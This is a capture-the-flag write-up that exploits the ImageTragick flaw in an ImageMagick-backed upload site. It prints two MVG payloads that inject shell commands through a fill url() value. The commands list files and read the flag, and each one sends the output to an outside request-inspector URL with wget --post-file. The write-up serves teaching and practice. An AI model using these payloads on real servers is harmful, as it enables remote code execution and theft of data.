Imagemagick
===========


https://ctf.nihwk.net/challenges#Imagemagick
--------------------------------------------
Solved by __Yuval Meshorer__


##  


## Step 1: Introduction


![](./Imagemagick_desc.png)






First thing's first, let's open the site.


![](C:\Users\magshimim\Desktop\Writeups\Imagmagick_site.png)


_It's important to note the supported file types here which are `png`, `jpg`, `jpeg`, `gif`, `mvg`, `svg`_


Now let's try to upload a few files. I used random images I found on my laptop and got this as a result:


![](C:\Users\magshimim\Desktop\Writeups\Imagemagick_background.png)


and the link being `http://flaskimage.herokuapp.com/uploads/ee21a2a4019c8f5801630e1e85485a4a_background3.jpg`


All images that are in the correct format (listed in the image above) will be uploaded as such:


`/uploads/{hash}_{image_name}`


Since the hash seems to be random I'll ignore it for now.


##  


## Step 2: Google


Searching `Imagemagick` in Google tells us that `Imagemagick` is an image editing and displaying software. Let's try searching for some vulnerabilities with this software, since we know that `http://flaskimage.herokuapp.com` uses `Imagemagick`


The first link in Google for `Imagemagick vulnerability` leads to a site `https://imagetragick.com/`, which after reading a bit seems to list common problems with the open-source software.


##  


## Step 3: Exploiting


After going over the site and reading it's contents, we see a paragraph that talks about MVG/SVG vulnerabilities: _"The most dangerous part is ImageMagick supports several formats like svg, mvg (thanks to [Stewie](https://hackerone.com/stewie) for his research of this file format and idea of the local file read vulnerability in ImageMagick, see below), maybe some others - which allow to include external files from any supported protocol including delegates."_


__TL;DR:__ We can supply code to be executed (RCE) through `svg` or `mvg` file types.


_(I used the `mvg` file type for this since it seemed shorter that the `svg`)_


On the site there's an `mvg` example of how to write the code that the server executes. If we try writing that into `exploit_test.mvg` the server responds with this:


![](C:\Users\magshimim\Desktop\Writeups\Imagemagick_error.png)


compared to the usual image we supplied on a black background.


_Now if we can only see what is being sent from the server..._


There is a site called "Request Inspector" which let's us see what requests are send to a URL they supply. Let's generate a URL to send to the server to see what hides there.


Site generated: `https://requestinspector.com/inspect/01cnrnna6wkm1txy8n0s4kas5m`


To view all requests: `https://requestinspector.com/p/01cnrnna6wkm1txy8n0s4kas5m`


Now let's create a new `exploit_test.mvg` which'll contain the new code. For me it looked like this:


```Vector Graphics
push graphic-context
viewbox 0 0 640 480
fill 'url(https:dd"; ls -la > file ;wget https://requestinspector.com/inspect/01cnrnna6wkm1txy8n0s4kas5m --post-file file")'
pop graphic-context
```


_What the code does is run the command `ls -la` on the server and send the response to `requestinspector`_


After uploading the file to the server, instead of showing us the file in `\uploads\` it downloads it for us! A quick inspection will show us that the new downloaded file is the file we submitted with the hash as prefix.


Now let's see the request we got from the site above.


![](C:\Users\magshimim\Desktop\Writeups\Imagemagick_response1.png)


We can see that our command `ls -la`  has been successful. After checking the long-named files, we find the flag inside `fduaipfdu98321321afdsafdauiuip\flag`. Let's modify the file run the new code.


```Vector Graphics
push graphic-context
viewbox 0 0 640 480
fill 'url(https:dd"; cat fduaipfdu98321321afdsafdauiuip/flag > flag_file ;wget https://requestinspector.com/inspect/01cnrnna6wkm1txy8n0s4kas5m --post-file flag_file")'
pop graphic-context
```


_What the code does is ask the server to output the flag into a file called `flag_file` which we later send `requestinspector` so we can view the answer_


Running the code (= uploading the `.mvg` file to the server) downloads the generated file again, meaning we can now go check the output. Checking the link we supplied we get:


![](C:\Users\magshimim\Desktop\Writeups\Imagemagick_response2.png)


Which outputs the flag `flag{you_kn0w_1magemag1ck_3xp10it_1s`, which means we're done!






Thanks for reading!


~Yuval
<!--stackedit_data:
eyJoaXN0b3J5IjpbLTcxNzg1MzI5MF19
-->